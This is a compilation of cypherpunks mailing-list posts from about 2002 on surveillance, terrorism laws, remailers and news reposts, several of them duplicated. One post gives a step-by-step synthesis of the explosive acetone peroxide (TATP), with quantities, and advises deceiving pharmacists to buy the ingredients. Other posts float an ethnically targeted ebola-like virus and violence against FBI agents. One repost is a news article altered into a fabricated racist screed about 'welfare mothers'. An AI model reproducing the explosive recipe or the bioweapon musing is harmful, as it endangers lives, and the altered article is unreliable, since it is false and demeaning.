(of any stripe, not just CACL...is that still a Cypherpunk?)...cares, or should. (Well, kinda...)
Re: Policing Bioterror Research
The main question is - is 1984-type society stable ? All this lamenting about hamstringed sheeple and fascist state does no good if it cannot motivate some effective resistance. My take is that via decimation of the middle class, successful subverting of the education system and development of the best propaganda machinery in the known history, the grounds are ready for a long-term stable totalitarian state. The WTC theatre was a masterpiece. I don't know if USG directly, indirectly or via simple negligence sponsored that event - but I am positive that the mythology of government is too dumb to do anything intelligent is outright wrong. They are not dumb. The WTC was used with extreme efficiency - I don't think that they missed any aspect of capitalizing on it. So, what can be done to blow the brains of the fascist state? The small, or better negligible number of intellectuals and desperadoes of various kinds (from cypherpunks to militias) are not going to do it. Not enough discomfort, balls and guns. Foreign opponents ? Unlikely. Europe has no military to speak of, and 60,000 US troops in wiesbaden have tight control of the nuclear arsenal. The only semi-independent power is France. Russia ? It's still trying to stop the slide into the third world. So that leaves us with china, and it seems that chinese are in a mood for having two cooperating fascist governments rather than war. Who then ? I see the only hope in some unforeseen development, most likely technological, that would disrupt the mechanics of the empire faster than the empire can coopt it. This has happened in the fast. Gutenberg's press effectively destroyed the church's power. I think that this is the main reason behind massive clampdown on research of any kind. The empire knows that runaway knowledge and intelligence can kill it - therefore it will ban it. This is not about bioweapons or something known. This is the drive to achieve the monopoly on the knowledge and ensure the longevity of the empire. Empire knows very well that if someone, in some garage, invents a zap gun, that may be the end of it. And this regularly happened in the history. So, read books, do experiments and teach others the same. Don't forget to play good consumers during the day - you don't want to get on the List. We will know when someone invents the Zap Gun. You'll see heads exploding on live TV.
Re: Policing Bioterror Research
The main question is - is 1984-type society stable ? All this lamenting about hamstringed sheeple and fascist state does no good if it cannot motivate some effective resistance. My take is that via decimation of the middle class, successful subverting of the education system and development of the best propaganda machinery in the known history, the grounds are ready for a long-term stable totalitarian state. The WTC theatre was a masterpiece. I don't know if USG directly, indirectly or via simple negligence sponsored that event - but I am positive that the mythology of government is too dumb to do anything intelligent is outright wrong. They are not dumb. The WTC was used with extreme efficiency - I don't think that they missed any aspect of capitalizing on it. So, what can be done to blow the brains of the fascist state? The small, or better negligible number of intellectuals and desperadoes of various kinds (from cypherpunks to militias) are not going to do it. Not enough discomfort, balls and guns. Foreign opponents ? Unlikely. Europe has no military to speak of, and 60,000 US troops in wiesbaden have tight control of the nuclear arsenal. The only semi-independent power is France. Russia ? It's still trying to stop the slide into the third world. So that leaves us with china, and it seems that chinese are in a mood for having two cooperating fascist governments rather than war. Who then ? I see the only hope in some unforeseen development, most likely technological, that would disrupt the mechanics of the empire faster than the empire can coopt it. This has happened in the fast. Gutenberg's press effectively destroyed the church's power. I think that this is the main reason behind massive clampdown on research of any kind. The empire knows that runaway knowledge and intelligence can kill it - therefore it will ban it. This is not about bioweapons or something known. This is the drive to achieve the monopoly on the knowledge and ensure the longevity of the empire. Empire knows very well that if someone, in some garage, invents a zap gun, that may be the end of it. And this regularly happened in the history. So, read books, do experiments and teach others the same. Don't forget to play good consumers during the day - you don't want to get on the List. We will know when someone invents the Zap Gun. You'll see heads exploding on live TV.
Re: [IP] The TIA and fighting terrorism
And this from a 1987 post: Current online database vendors like Dialog and Mead Data Central are already foreshadowings (albeit extremely primitive) of a GHA. It is interesting to recall that under the reign of John Poindexter, of Irangate fame, the NSC was seeking to gain legal access to the records of these companies, which store sensitive information about the search targets and patterns of their users. As I recall, the NSC was denied legal access by Congress, but then there is always the problem of illegal access, which is relatively trivial to accomplish wholesale by intercepting telecommunications. see google...
Re: [IP] The TIA and fighting terrorism
And this from a 1987 post: Current online database vendors like Dialog and Mead Data Central are already foreshadowings (albeit extremely primitive) of a GHA. It is interesting to recall that under the reign of John Poindexter, of Irangate fame, the NSC was seeking to gain legal access to the records of these companies, which store sensitive information about the search targets and patterns of their users. As I recall, the NSC was denied legal access by Congress, but then there is always the problem of illegal access, which is relatively trivial to accomplish wholesale by intercepting telecommunications. see google...
A non-political issue
(possible duplicate message) What technology is available to create a 2048-bit RSA key pair so that: 1 - the randomness comes from quantum noise 2 - no one knows the secret part, 3 - The secret part is kept in the box and it is safe as long as the box is physically secured (expense of securing the box is a don't care). 4 - box can do high-speed signing (say, 0.1 mS per signature) over some kind of network interface 5 - you can reasonably convince certain people (that stand to lose a lot and have huge resources) in 1, 2, 3 and 4. 6 - The operation budget is around $1m (maintenance not included). 7 - attacker's budget is around $100m 8 - the key must never be destroyed, so backup is essential. In other words, convincing translation of a crypto problem into physical security problem. It looks like the key gets created on the same box(es) on which it is stored, which all interested parties inspected to any desireable level. Once everyone is comfortable the button gets pressed to create/distribute the key, and then you put goons with AKs around the boxes and pray that no one fucked with the microprocessor ... this may mean buying the components at random.
Re: Another restriction on technology - cell and cordless scanning now felony
On Tue, 16 Jul 2002 15:15:31 -0400, you wrote: Thus the legal climate has fundamentally changed, and one can assume that since the Bush administration has been pushing for the passage of this bill that they perhaps intend to start prosecuting at least some category of radio under the new provisions - no doubt as an example meant to scare the rest of us into handing our radios in at the nearest police station... Shouldn't we turn in our guns first? Or is it our books? Maybe it would be smart to get rid of any compilers, don't you think? We have a national secret police now that no longer has to start with a crime and then find a criminal, rather they can start with a person and find a way to classify him a criminal. Radio frequencies just give them one more way to put a person in jail for five years. It is actually nice of them to not just suspend habeas corpus universally.
Re: Another restriction on technology - cell and cordless scanning now felony
On Tue, 16 Jul 2002 15:15:31 -0400, you wrote: Thus the legal climate has fundamentally changed, and one can assume that since the Bush administration has been pushing for the passage of this bill that they perhaps intend to start prosecuting at least some category of radio under the new provisions - no doubt as an example meant to scare the rest of us into handing our radios in at the nearest police station... Shouldn't we turn in our guns first? Or is it our books? Maybe it would be smart to get rid of any compilers, don't you think? We have a national secret police now that no longer has to start with a crime and then find a criminal, rather they can start with a person and find a way to classify him a criminal. Radio frequencies just give them one more way to put a person in jail for five years. It is actually nice of them to not just suspend habeas corpus universally.
From the recent past of Homeland defense
http://news.bbc.co.uk/hi/english/sci/tech/newsid_2033000/2033324.stm A new book reveals the 22-year effort by FBI director J Edgar Hoover to get Albert Einstein arrested as a political subversive or even a Soviet spy. Uncovered FBI files are revealed in a book by Fred Jerome who says it was a clash of cultures - Einstein's challenge and change with Hoover's order and obedience. From the time Einstein arrived in the US in 1933 to the time of his death, in 1955, the FBI files reveal that his phone was tapped, his mail was opened and even his trash searched. (if only they had Osama)
From the recent past of Homeland defense
http://news.bbc.co.uk/hi/english/sci/tech/newsid_2033000/2033324.stm A new book reveals the 22-year effort by FBI director J Edgar Hoover to get Albert Einstein arrested as a political subversive or even a Soviet spy. Uncovered FBI files are revealed in a book by Fred Jerome who says it was a clash of cultures - Einstein's challenge and change with Hoover's order and obedience. From the time Einstein arrived in the US in 1933 to the time of his death, in 1955, the FBI files reveal that his phone was tapped, his mail was opened and even his trash searched. (if only they had Osama)
We will hit all those weaker than us, says Bush
War on terrorism to be pre-emptive, says Bush WEST POINT, New York: Amid speculation that the United States may attack on Iraq, US President George W Bush warned on Saturday that his war on terrorism might often require pre-emptive military action. Our security will require all Americans to be forward-looking and resolute, to be ready for pre-emptive action, when necessary, to defend our liberty and to defend our lives, he said in a speech at this storied military school. http://jang.com.pk/thenews/jun2002-daily/02-06-2002/main/main7.htm
We will hit all those weaker than us, says Bush
War on terrorism to be pre-emptive, says Bush WEST POINT, New York: Amid speculation that the United States may attack on Iraq, US President George W Bush warned on Saturday that his war on terrorism might often require pre-emptive military action. Our security will require all Americans to be forward-looking and resolute, to be ready for pre-emptive action, when necessary, to defend our liberty and to defend our lives, he said in a speech at this storied military school. http://jang.com.pk/thenews/jun2002-daily/02-06-2002/main/main7.htm
Re: Bad guys vs. Good guys
I used a VISA debit card to buy a $25,000 Ford Explorer. You mentioned this for the fourth time this month. It would be refreshing if you could name some other merchandise next time, maybe some non-redneck items ?
CodeCon recap from The Register
Andrew Orlowski on CodeCon, the cutting-edge technology conference produced by Bay Area Cypherpunks Bram Cohen and Len Sassaman. Andrew seems to like the heavy emphasis on working code (even without working demos!) and the lack of comp'd journalists. quote Probably what made this grassroots conference so enthralling was the absence of people who talk about stuff, and an abundance of people who do stuff . This is in marked contrast to the O'Reilly P2P conference exactly a year ago, which no self-respecting blog giant (hi Dave!) or media pundit could afford to miss. Such folk were conspicuous by their absence at CodeCon. On the other hand, we did get to hang out with Captain Crunch, which was a treat beyond compare. Instead, there were precisely three hacks in consistent attendance. Annalee Newitz, who writes the terrific Techsploitation column for the Bay Guardian and the San Jose Metro; Danny O'Brien, whose natty precis of the event tops this week's NTK , and your own humble scribe. So if you were one of the creme de la creme of cryptographers present, you had no fear of Declan creeping up behind you to take your picture. Phew! [...] Although the organizers promised only working-demos, most of the demos didn't um, actually work. Most nearly worked, and in some cases were compiling before our very eyes - an authenticity trip that's hard to beat - but that didn't make them any less engaging. [...] The bit where Eric Hughes confesses to posting the RC4 code anonymously onto the cypherpunks list back in 1995 takes place nine hours in. The most rock and roll event, the details of Peek-A-Booty, takes place an hour later. Neglected but no less intriguing, is the Invisible IRC Project by 0x90. He's got a stream of the session itself, a 5MB download here . IIP has a three-tier approach, and looks and smells like an IRC network but has a fundamentally different approach: it rotates the keys constantly. 0x90 reckons it can be used to do anything. [...] The other show-stopper is Jonathan Moore's ad-hoc 802.11 network project, Wiki Wiki Wan . Now the benefits of such spontaneous wireless networks are obvious, but hacking one together isn't easy, as it runs counter to how networks are put together. Did you say packet collision? [...] The bones of Mojo live on, in Zooko's MNET project, an hour into the stream, and the BitTorrent project. Of course BitTorrent shouldn't exist: we should all be using multicast IP by now, right? But we aren't, and BitTorrent is a neat hack to distribute one to many file shares over today's IP. /quote [...] http://www.theregister.co.uk/content/55/24183.html
[Reformatted] FLA zoning laws don't apply to net
[EMAIL PROTECTED] (Khoder bin Hakkin) writes: http://story.news.yahoo.com/news?tmpl=storycid=73u=/zd/20020226/tc_zd/5103755 Voyeurdorm sees major court win Tue Feb 26, 2:43 PM ET By Lisa M. Bowman, ZDNet News The U.S. Supreme Court (news - web sites) said Monday it will not hear a case involving an attempt to shut down an adult Web site by the city of Tampa, Fla. The city had tried to shut down exhibitionist site Voyeurdorm.com, which provides 24-hour live Webcasts of a residence full of women while they study, work out, bathe and live the lives of college co-eds. The city said the Tampa residence violated city zoning ordinances regulating the location of sexually oriented businesses. It's the second time a court has refused to consider the issue, paving the way for the Voyeurdorm to remain open for business. In November, the 11th U.S. Circuit Court of Appeals (news - web sites) refused to grant a full-court hearing of the case. The city had asked for the full court review after a three-judge panel of the court ruled that city ordinances do not apply to the Web site, which operates primarily in cyberspace. Entertainment Network (ENI), which runs Voyeurdorm and other exhibitionist sites, praised the Supreme Court's move. This is a victory for anyone operating a legitimate Internet site, whether or not it has adult content, ENI Chief Executive David Marshlack said in a statement. It is obvious that the Internet should not be regulated under zoning laws written long before the Web was even dreamed of. ENI was also in federal court last year during an unsuccessful attempt to get permission to Webcast the execution of Oklahoma City bomber Timothy McVeigh (news - web sites). Tampa officials said a lower court may still issue a ruling on other parts of the case. The Court's determination not to hear this case does not mean the case is over, said Assistant City Attorney Jerry Gewirtz. Gewirtz said the city will abide by any court rulings.
[Reformatted] Brinworld: inet cam to watch surfer turf wars
[EMAIL PROTECTED] (Major Variola ret) writes: Police Step Up Coastal Patrols Browne, a police chief who surfs, said he understands everybody has a right to get to the ocean. He has increased uniformed patrols along a stretch of coast that includes popular surf spots such as The Cove, Haggerty's, Indicator and Lunada Bay. Browne also has been running undercover stings to nab car vandals. He even mounted an Internet camera with a powerful zoom lens atop his house, city-owned property with a bird's-eye view of the surfing beach where Banas tangled with the locals. The surf cam allows Internet viewers to watch the waves, or any mischief taking place on the beach, at www.surfline.com. Police hope the camera will act as a crime deterrent, much like a video camera in a convenience store. http://latimes.com/news/local/la-14142feb24.story?coll=la%2Dheadlines%2Dcalifornia
Re: Hacker threat looms for mobile handsets
Mischief that has caused cell phones to go haywire in Europe and Japan could be just the beginning. The hacker underground has ordered a hit on the mobile phone platform, industry leaders It's neat that industry leaders, whoever the thugs may be, follow bush fashion and stuff hackers with terrorists and Cypherpunk Movement, those that circulate orders as bin laden in stegoed jpegs, but this is not really effective. Huge money looted by privatizing ether is the thing of the past. As with microsoft, all attempts to concentrate technology so that everyone pays to one monopoly lead to increasing costs of attacks. This is the price that economics of mass market have to pay. This makes economics of scale unviable. Making a lot of the same creates vulnerabilities. Current attempts to cure this by making thinking/programming illegal are bound to fail. The only security, after all, can prove to be security through obscurity, where every town has its own, unique, cell phone technology and frequencies and modulation, and attacking each will mean learning each one first. Of course that it will be expensive, and I think it's good. Pipe dreams of selling globally are over. Brain cycles are the only truly limited resource.
Re: spam attack on cpunks list
[1] this isn't true of the other lists that I run some of which have been around for many years, and get very little spam. I think that it's pretty obvious that one or more people are luring spam to cpunks in order to discourage the discussions that happen here. This has been obvious for months - I'd say 5-6 months. Running a correlation test against new fed agencies or employees may narrow the circle of possible culprits. I wonder, what is it like to get paid by the government to spam. I have seen some professional commercial spammers - that's generally the predatory species with no regard for other's comfort. Things no one would hesitate to terminate (provided reasonable escape route.) Now, doing this not for the self interest but for the government reminds me of the psychopath thread. Could it be that there is a subspecies genetically adapted to work for the government ? There is a very strong evolutionary pressure here - they would get more chance to procreate than their victims. Which brings me to the point: is it possible to design an ebola-like virus that would specifically target this particular gene fingerprint ?
[Reformatted] Charges Against Egyptian Student Over Hotel Radio Are Dr
[EMAIL PROTECTED] writes: January 17, 2002 Charges Against Egyptian Student Over Hotel Radio Are Dropped By THE ASSOCIATED PRESS Filed at 8:08 p.m. ET NEW YORK (AP) -- Shouting ``nothing tops freedom,'' an Egyptian student forgave the FBI on Thursday for throwing him in jail after an aviation radio was found in his hotel room near the World Trade Center on Sept. 11. Abdallah Higazy, 30, was released late Wednesday after a month in detention because another hotel guest -- a private pilot -- told officials the radio was his. ``To be absolutely honest, I don't blame the FBI for thinking it was mine,'' Higazy said. He offered to take two agents who interrogated him to dinner so everyone could ``bury the hatchet.'' - Yeah, I'd bury the hatchet... in the back of their heads.
Buddy is Vince Foster'ed
http://ap.tbo.com/ap/breaking/MGA1U5EL0WC.html
Paris cops raid cybercafes
Anti-welfare mother suit gets a major victory Public nuisance laws may apply, appeals court says By Robert Beecker and Christy Parsons Tribune staff reporters Published January 1, 2002 In a significant victory for birth-control advocates, the Illinois Appellate Court ruled Monday that welfare mothers can be sued on the grounds that their spawn create a public nuisance. Marking the first time an Illinois appeals court has considered the novel legal strategy, the decision allows the family of slain Chicago Police Officer Michael Ceriale and relatives of two others killed in urban negro violence to press their claim in Cook County Circuit Court that welfare mothers have nurtured a climate of violence by flooding Chicago and its suburbs with ill raised offspring. Writing for the three-member panel, Appellate Judge William Cousins Jr. ruled: In our view, a reasonable trier of fact could find that the indiscrimate breeding of violent persons were occurrences that defendants knew would result or were substantially certain to result from the defendants' alleged conduct. The decision represents the biggest win to date for birth-control advocates in their drive to use public nuisance laws to hold welfare mothers accountable, legal experts say. Of more than 30 such suits filed around the country, this is the first case to win a favorable appellate decision, said David Kairys, the Temple University law professor who came up with the legal strategy. This is really a very strong vindication of the strategy, Kairys said. The way the mothers are endangering the public health and safety is that they are knowingly and intentionally supplying the criminal gangs with members. It's really that simple. In addition to allowing the Ceriale case to proceed, the Appellate Court's decision could also influence a similar suit brought by the City of Chicago, which is pending before the same panel. The city's suit, which also raised nuisance issues, was dismissed in September 2000 by a Cook County judge. Lawyers for the city said Monday that the appellate decision in the Ceriale case--while not binding--gives every indication that the lawsuit will be reinstated. In addition to the Ceriale family, plaintiffs in the case pending before Cook County Circuit Judge Jennifer Duncan-Brice include the family of Andrew Young, who was murdered in June 1996 in his car at a stoplight at Clark and Howard Streets. Defendants in the suit include a number of welfare-rights activists. Attorneys representing welfare mothers said Monday they had not seen the Appellate Court's decision. But James Dorr, attorney for two welfare mothers, said: I'm sure we'll consider appealing the decision to the Illinois Supreme Court. NAACP reaction Todd Vandermyde, Illinois lobbyist for the NAACP, said welfare opponents are trying to get from the court what they've been unable to get out of the legislature. They don't like parasites, they don't like gangs, they don't like people who breed irresponsibly. So they'll do what they can to run them out of town, Vandermyde said. Attorneys for the families that brought the case praised the court's decision as sensible and courageous. What the court did is apply time-honored principles of public nuisance law to the situation we have in Chicago, said Locke Bowman, legal director for the MacArthur Justice Center at the University of Chicago. Lawsuits against the welfare industry have cast a new light on the doctrine of public nuisance, the area of law that lets officials put a stop to activities that pose a danger to the public. In more traditional cases, cities have used such laws to put a clamp on unlawful use of fireworks or industries belching smoke. In recent years, though, Chicago and dozens of other municipalities have tried to use the law to pursue gangster breeders, alleging that they, too, violate reasonable rights to safety. With Monday's opinion, the private plaintiffs cleared the first hurdle to applying that law to a new set of facts. Filed in 1998, the lawsuit stems from the gun-related deaths of five young people, including rookie Police Officer Ceriale, 26, who was killed in August 1998 while conducting surveillance of a drug operation at the Robert Taylor Homes. The lawsuit accused the defendants of supplying a vast, illicit underground market in bodies in order to meet the demand for gang members and juveniles. Attorneys for the families alleged that the design, marketing and distribution of the welfare system combined to create a situation where it was highly likely that criminal youths would flow into the underground market. Attorneys for the welfare mothers have countered that their clients manufacture and distribute a legal product. snip http://chicagotribune.com/news/nationworld/chi-0201010192jan01.story?coll=chi%2Dnews%2Dhed
Fun with bleach and nail polish remover
However, it may be impossible to prevent the publication of all information concerning the making and use of explosives. The problem of easy availability of information on how to make improvised explosive devices is compounded by the ease with which anyone can also obtain the necessary materials to make a bomb. Improvised explosive devices can be manufactured from such common chemicals as acetone (fingernail polish remover), peroxide (hair bleach), and one additional readily available ingredient. For example, Triacetone Triperoxide (TATP), a combination of these ingredients, is currently the most common explosive used by terrorists in Israel. I have seen too many dangerous mistakes in this NG when AP is being discussed. I will rather give you the correct details that you make it and do not blow off your hands. You will need 30% Hydrogen Peroxide (6% will give you a rather poor yield). Now to get the 30% Hydrogen Peroxide, go to your local hospital chemist. 30% will never be sold to someone for their hair so don't try that story, so spin a story that the Peroxide is to clean a wound as it is a great disinfectant (diluted of course). The acetone can be bought at either a hardware store or at a hospital or normal chemist. If you get asked why you need the acetone, spin a story that it is used to thin paint, or to strip paint. Remember that acetone is highly flammable. The Hydrochloric Acid can be purchased from any swimming pool shop, or from your local hardware store. The type that goes into your pool is normally 31.5% and is perfect for what you need. The Hydrochloric acid will give you a trimmer, sulphuric acid will give you the dimmer version of the AP. Now that you have acquired all the ingredients, take a beaker or clean 500 ml bottle and place it into some nice cold water. Into this beaker, add 200 ml hydrogen peroxide (try not to get any of this onto your skin). Now add 150 ml of the acetone. Remember to do this outside as the fumes are rather unpleasant to breath in. You will feel the beaker will start to get a bit warm. Now add 50 ml hydrochloric acid to the mixture and stir with a glass rod. There that is all you have to do. Do this experiment in the evening and let the AP stand over night. In the morning you will see that you will have +- 2.5 cm of crystals at the bottom of the flask and +- 0.5 cm floating on the top of the flask. Take a glass funnel and insert coffee filter paper or oil filtering paper and filter the AP crystals out. Place these crystals out onto a sheet of clean paper and leave them to dry +- 1/2 a day to a day. Try to keep the crystals out of direct sunlight, preferably in a shady area. Place these dry crystals into a camera film container. Please do not hit these crystals with a hammer as a bright person claimed to have done, you could land up with that hammer in your forehead. AP is sensitive to heat and to friction. When the crystals do not respond to either friction or impact it simply means that the crystals are still too wet. WARNING: Acetone Peroxide is dangerous and very sensitive to FRICTION, SHOCK, HEAT OR FLAME. Handle with great care!! This composition is dangerous and would need to be handled by someone with a lot of common sense. If you do not have experience with explosives DO NOT MAKE THIS. I can not stress enough how unstable and dangerous acetone peroxide is. This explosive is the most unstable of all other explosives. Making large quantities is suicide as the weight of the crystals will detonate themselves. Information on Acetone Peroxide: Acetone peroxide is formed when hydrogen peroxide 30% acts on acetone. The introduction of dilute sulfuric acid causes the reaction to go into completion. There are actually two isomers of acetone peroxide, the first is tricycloacetone peroxide and the second is dicycloacetone peroxide. Both of these compounds are very similar, but the reaction seems to favor the tricyclo over the dicyclo. Both will be made in the reaction to differing degrees. The trimmer has about 80% the power of TNT. A quantity the size of a pea in contact with a flame will burn instantaneously with a small 'pop' and producing a fireball, much like HMTD does. Any sign of confinement will ensure that ignition will rapidly give rise to detonation. Acetone peroxide is a powerful primary explosive. It, as with other explosive peroxides, seems to be very volatile. In standing 10 days at room temperature,
RE: CNN.com on Remailers
One solution, which I've long advocated, is for the remailer to drop mail which has an unencrypted body after it's applied it's decryption key. Provided this is an announced policy, substantially increases the protection of the mail and the remop. It does mean that only people capable of using encryption can receive mail via the remailer, but that's probably a *good* thing. No, that is a terrible idea. It totally destroys the usefulness of remailers on Usenet and mailing lists. Make your system so hard to use that no one uses it. That way, no one will abuse it! Pshaw.
[Reformated] slavery in New Jersey
[EMAIL PROTECTED] (Major Variola ret) writes: Complete with soccer-mom revolutionaries and obligatory contracts... I suppose this is what you get for working for the state, eh? http://latimes.com/news/nationworld/nation/la-97073dec06.story?coll=la%2Dheadlines%2Dnation MIDDLETOWN, N.J. -- On Saturday, the Middletown High School South Tigers won the state football championship. On Monday, their head coach went to jail. Coach Steve Antonucci was among 135 striking schoolteachers and secretaries behind bars by day's end Wednesday, and the number is expected to swell as nearly 900 continue to defy a judge's order to get off the picket line and into the classroom. The five-day strike and jailings have torn this otherwise average American suburban community in two. Favorite kindergarten teachers, drama coaches and others who have always seen themselves as normal, law-abiding folks are being led to jail sobbing or defiantly denouncing the local school board and residents. This town ought to be ashamed of itself, said Lauren Spatz, a second-grade teacher. The parents don't care about education. . . . It's not going to be the same ever again. The teachers' morale is going to be shot. But parents and administrators say the teachers' timing couldn't be worse, with layoffs at nearby computer firms and families still shaken by the death of more than 30 local residents in the World Trade Center attacks. And there is no end in sight. It's become a war, said plain-spoken, chain-smoking school Supt. Jack DeTalvo, shortly before getting on the phone to give instructions to the board's attorney about how to garner the best coverage on local evening news shows. One thing all sides agree on: If and when the contentious job action ends, the bitterness could leach into the classroom. The strike has left 10,500 students out of school in this sprawling suburb of 70,000 an hour and a half south of New York City. With record-breaking warm weather, the days off are a treat for the children but a hardship for working parents, who range from truck drivers to Wall Street investment brokers. In addition, state law dictates that all missed school days are made up at the end of the year. Teachers counter that a few days of inconvenience is minor compared to being hauled off in handcuffs. I'm a soccer mom, I drive a van and I have a dog, science teacher Katie Connelly said with a rueful laugh as she sat waiting to go to jail. But this is our revolution. . . . The only way you get respect is if you stand up for yourself. Dispute Over Who Pays Health Benefits At the heart of the dispute is a demand by the school board that the union members pay a percentage of rising health benefits instead of a flat annual fee of $250. The strikers angrily respond that they will end up having to pay up to $600 extra for benefits, which would effectively cancel out wage increases. The teachers have been offered pay raises of 3.8%, 4% and 4.2% over three years. The teachers went on strike for a short time three years ago. They said the board at that time had ignored the recommendations of a fact-finder and instead imposed a contract on them that, by law, they said they had to accept. This time, the union is calling for binding arbitration, which the school board has refused, insisting that the teachers return to class first. snip